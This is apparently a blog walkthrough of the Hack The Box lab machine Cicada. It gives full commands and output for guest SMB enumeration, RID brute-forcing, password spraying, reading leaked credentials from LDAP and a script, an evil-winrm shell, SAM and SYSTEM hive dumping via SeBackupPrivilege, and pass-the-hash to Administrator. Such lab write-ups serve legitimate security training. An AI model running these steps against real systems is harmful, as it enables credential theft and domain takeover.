Overview

The machine starts by SMB guest access that exposes an HR share with a default onboarding password, RID brute-forcing enumerates domain users and password spraying gets initial credentials for michael.wrightson, LDAP enumeration leaks david.orelious's password in his description attribute giving read access to the DEV share where a backup script exposes emily.oscars's credentials to get a winrm shell, emily holds SeBackupPrivilege as a Backup Operator so we dump the SAM and SYSTEM hives and extract the Administrator NTLM hash to get shell as Administrator via Pass-the-Hash.

Enumeration

We'll start with nmap scan as usual

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.231.149 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-05 03:31 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:31
Completed Parallel DNS resolution of 1 host. at 03:31, 0.11s elapsed
Initiating Connect Scan at 03:31
Scanning 10.129.231.149 [1000 ports]
Discovered open port 53/tcp on 10.129.231.149
Discovered open port 135/tcp on 10.129.231.149
Discovered open port 445/tcp on 10.129.231.149
Discovered open port 139/tcp on 10.129.231.149
Discovered open port 464/tcp on 10.129.231.149
Discovered open port 593/tcp on 10.129.231.149
Discovered open port 636/tcp on 10.129.231.149
Discovered open port 3269/tcp on 10.129.231.149
Discovered open port 3268/tcp on 10.129.231.149
Discovered open port 389/tcp on 10.129.231.149
Discovered open port 88/tcp on 10.129.231.149
Completed Connect Scan at 03:32, 11.72s elapsed (1000 total ports)
Initiating Service scan at 03:32
Scanning 11 services on 10.129.231.149
Completed Service scan at 03:32, 48.12s elapsed (11 services on 1 host)
NSE: Script scanning 10.129.231.149.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:32
Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.93% done; ETC: 03:33 (0:00:00 remaining)
Completed NSE at 03:33, 40.09s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 2.97s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
Nmap scan report for 10.129.231.149
Host is up, received user-set (0.13s latency).
Scanned at 2026-06-05 03:31:53 PDT for 103s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-06-05 17:32:11Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-05T17:33:36+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
< SNIP>
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
< SNIP>
| _ssl-date: 2026-06-05T17:33:34+00:00; +7h00m00s from scanner time.
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-05T17:33:36+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
< SNIP>
3269/tcp open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-05T17:33:34+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
< SNIP>
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2026-06-05T17:32:57
| _ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 57184/tcp): CLEAN (Timeout)
| Check 2 (port 12292/tcp): CLEAN (Timeout)
| Check 3 (port 19380/udp): CLEAN (Timeout)
| Check 4 (port 51274/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
| _clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:33
Completed NSE at 03:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.45 seconds

we've got DNS, SMB, NETBIOS, LDAP, LDAPS, and some Kerberos so we're sure it is an AD environment

the domain name is cicada.htb and FQDN is CICADA-DC.cicada.htb so we need to add those to our hosts file
there is ADCS in place with the CA CICADA-DC-CA
there is a big skew time 7 hours so we need to sync our times

Lets setup the environment

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ echo '10.129.231.149  CICADA-DC CICADA-DC.cicada.htb cicada.htb' | sudo tee -a /etc/hosts
10.129.231.149  CICADA-DC CICADA-DC.cicada.htb cicada.htb
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] krb5 conf saved to: krb5.conf
SMB 10.129.231.149 445 CICADA-DC [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.conf 
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ sudo ntpdate cicada.htb 
2026-06-05 10:39:58.768614 (-0700) +25200.136446 +/- 0.037808 cicada.htb 10.129.231.149 s1 no-leap
CLOCK: time stepped by 25200.136446

we're not given any credentials so lets test the Guest account if enabled and it if is we'll try to find a readable share

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u 'Guest' -p ''
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Guest:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u 'Guest' -p '' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL Logon server share

and we found a file called Notice from HR.txt so let's download it one issue with smbclient is we can't embed the file names in single quotes to escape the spaces and one of the solutions I always do is downloading all files as you see

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ smbclient //cicada.htb/HR -U'Guest'%''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 05:29:09 2024
  ..                                  D        0  Thu Mar 14 05:21:29 2024
  Notice from HR.txt A 1266 Wed Aug 28 10:31:48 2024

                4168447 blocks of size 4096. 459490 blocks available
smb: \> get Notice from HR.txt
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Notice
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \>

and as you can see it looks like an on-boarding notice with default password setup Cicada$M6Corpb*@Lp#nZp!8

shell

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

so lets get a list of users, we can try --users and --rid-brute and if those didn't work we'll look for null bind in LDAP to get users but the --rid-brute worked here

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u 'Guest' -p '' --rid-brute
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.129.231.149 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)

here is our users list

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ cat rid.txt | grep User | cut -d "\\" -f 2 | grep -v Group | sed 's/ .*//g' > users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

User Michael

at this point we got a list of users and a possible password for one of them so lets password spray this list

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

and trying to list shares for this user, still no read access over the DEV share

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share

so i tested the user against LDAP and it worked so I always run my ldaphunt to find any passwords or info leaked in ldap attributes in actual pentesting cases you always will run this kind of scans, also in HTB machines specially easy ones

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
LDAP 10.129.231.149 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) (signing:None) (channel binding:Never)
LDAP 10.129.231.149 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

User david

by looking at this data i found this the user david.orelious leaked his password in the description

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
LDAP 10.129.231.149 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) (signing:None) (channel binding:Never)
LDAP 10.129.231.149 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.129.231.149 389 CICADA-DC [*] Enumerated 8 domain users: cicada.htb
LDAP 10.129.231.149 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.231.149 389 CICADA-DC Administrator 2024-08-26 13:08:03 2 Built-in account for administering the computer/domain
LDAP 10.129.231.149 389 CICADA-DC Guest 2024-08-28 10:26:56 0 Built-in account for guest access to the computer/domain
LDAP 10.129.231.149 389 CICADA-DC krbtgt 2024-03-14 04:14:10 2 Key Distribution Center Service Account
LDAP 10.129.231.149 389 CICADA-DC john.smoulder 2024-03-14 05:17:29 2
LDAP 10.129.231.149 389 CICADA-DC sarah.dantelia 2024-03-14 05:17:29 2
LDAP 10.129.231.149 389 CICADA-DC michael.wrightson 2024-03-14 05:17:29 0
LDAP 10.129.231.149 389 CICADA-DC david.orelious 2024-03-14 05:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP 10.129.231.149 389 CICADA-DC emily.oscars 2024-08-22 14:20:17 1

and we got read over the share DEV using this david user so lets see what we can find

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc smb 10.129.231.149 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV READ
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share

there is a Backup powershell script, that uses the credentials of user called emily to backup files

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ smbclient //cicada.htb/DEV -U'david.orelious'%'aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 05:31:39 2024
  ..                                  D        0  Thu Mar 14 05:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 10:28:22 2024

                4168447 blocks of size 4096. 478048 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> exit
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Shell As Emily

and you got the user flag

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc winrm cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ../Desktop/user.txt
76cdfd025b88fa3913072d957d4b81ca
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

looking at this user's groups and privileges we can see that she got SeBackupPrivileges and she is a member of Backup Operators groups

plaintext

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

so I dumped the HKLM hives and lets crack them offline

plaintext

*Evil-WinRM* PS C:\Users\emreg save HKLM\system system.save
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save HKLM\sam sam.save
The operation completed successfully.

Shell as Administrator

dumping the hashes locally out of the hives got us the administrator's hash

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ secretsdump.py -sam sam.save -system system.save LOCAL
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

and we got root

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc winrm cicada.htb -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -X 'type C:\Users\Administrator\Desktop\root.txt'
WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
WINRM 10.129.231.149 5985 CICADA-DC [+] Executed command (shell type: powershell)
WINRM 10.129.231.149 5985 CICADA-DC 65dfceac2e580d05f3e486b0422c7a1c

Resources

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry

HTB: Cicada

Overview

Enumeration

User Michael

User david

Shell As Emily

Shell as Administrator

Resources

Share

Subscribe to the newsletter

Overview

Enumeration

HR Share

User Michael

User david

Dev Share

Shell As Emily

Shell as Administrator

Resources

Share

Subscribe to the newsletter